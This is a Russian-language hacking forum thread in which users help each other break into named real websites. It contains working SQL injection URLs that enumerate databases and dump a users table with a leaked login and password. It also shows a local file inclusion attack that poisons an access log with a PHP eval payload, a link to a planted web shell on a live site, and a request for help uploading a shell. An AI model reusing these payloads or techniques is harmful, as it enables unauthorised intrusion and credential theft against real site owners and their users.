Там фильтруется select(юнион кстати тоже) http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63-- - >> true http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63-- select >> false А без селекта ты ничего не добъешься, кроме вывода стандартных функций, ну узнаешь ты номер версии посимвольным перебором, и? http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/access.log%00&c=; user agent: <?php eval($_REQUEST['c']); ?> Ну а дальше масса вариантов. http://www.libertarias.com/wso.php Пасс держи в пм по понятным причинам, также по понятным причинам пришлось запороть оба лога. Cам инклюд в коде index.php PHP: $op = $_GET['op']; //... if ($busqueda=="") { include("op/$op.php"); Тоже пофикшен, по понятным причинам, т.к. автор вопроса получил и ответ и шелл в пм.
Ну раскрытие путей точно есть, дальше без кода сразу не определить. Я думаю тебе будет полезно(пробелы убрать): http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=5,1,2)) >>> true http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=4,1,2)) >>> false http://mctb.ru/comments/(0)and(select*from(select(name_const(version(),3)),name_const(version(),3))a)
Слушай, а где можно почитать, про то, что ты сделал? Вроде похоже на SQL инъекцию. Но хоть ты убей не могу понять, как она тут работает...
Ок. Спрошу прямо: В чем разница между проведением инъекции в запросах вида "*.php?id=1" и "*/comments/1".
Ни в чем это всего лишь mod_rewrite, т.е. ЧПУ (человеко понятные ссылки), по всей своей логике, скорее всего /comments/1 будет обрабатываться как .php?comments=1
Но кроме этого, mod_rewrite может поддерживать передачу цифр, а так называемый обход ЧПУ позволит подставлять всё что угодно, так что надеться на это не нужно и фильтровать данные в любом случае. Яркий пример - DLink.
проблема в следуйщем не могу вывести нужные колонки http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,concat%28userid,0x3b,password%29,4,5+from+plus_signup+-- в чем ошибка
http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,concat%28userid,0x3b,password%29,4,5+from+test_db.plus_signup+-- jeff;123456
ммм... как это: "mod_rewrite может поддерживать передачу цифр"? mod_rewrite это модуль, который преобразует урл по правилам прописанными в директиве RewriteRule, и передаваться могут те символы, которые указаны в правиле. так же может использоваться как mod_rewrite так и самопальный роутер на php вариантов масса, и как таковой "обход ЧПУ", это очень смутный вид/метод атаки (если это можно так назвать) получаемые данные, они на то и получаемые данные, что их можно модифицировать, и если их не фильтровать, безопасность сайта находится под угрозой, а каким способом они будут передаваться разницы нет, будь то _GET, _POST, _COOKIE, _SESSION, преобразованные из URL методами mod_rewrite или роутером.
не получается просмотреть таблицы http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,3,group_concat%28table_name%29,5+FROM+information_schema.tables+WHERE+table_schema=0x7765626d6e675f70726f64756374 база данных webmng_product
Code: http://www.gideons.com.my/news_process.php?id=(0)union/*!all*/select(1),2,3,group_concat(table_name,0x3a,column_name+separator+0x3c62723e),(5)from(information_schema.columns)where(table_schema=0x7765626D6E675F70726F6475637473)--+
http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,group_concat(0x0b,table_name),4,5+from+information_schema.tables+where+table_schema=0x7765626d6e675f70726f6475637473+--+ gallery, gallery_group, news, product_category, products_detail
Нету там инклюда. А вообще определить есть ли инклюд или нету можно так: Попробуй перед значением подставить: ./ или / Если контент не изменился, то вполне возможно что инклюд. PHP: <?php include('cat/'.$_GET['page'].'.php'); // cat/blabla.php - true include('cat/'.$_GET['page'].'.php'); // cat//blabla.php - true include('cat/'.$_GET['page'].'.php'); // cat/./blabla.php - true include('cat/'.$_GET['page'].'.php'); // cat/blabla/.php - FALSE ?> Если примерна такая картинка, то инклюд есть. Это не беря в расчет всякие там филтры, которые могут обрезать "/" и т.д..
подскажите как правильно залить шелл: делаю так создается файл:userfiles/1.php с содержимым но как пхп не отоброжается, что можно сделать в такой ситуации?
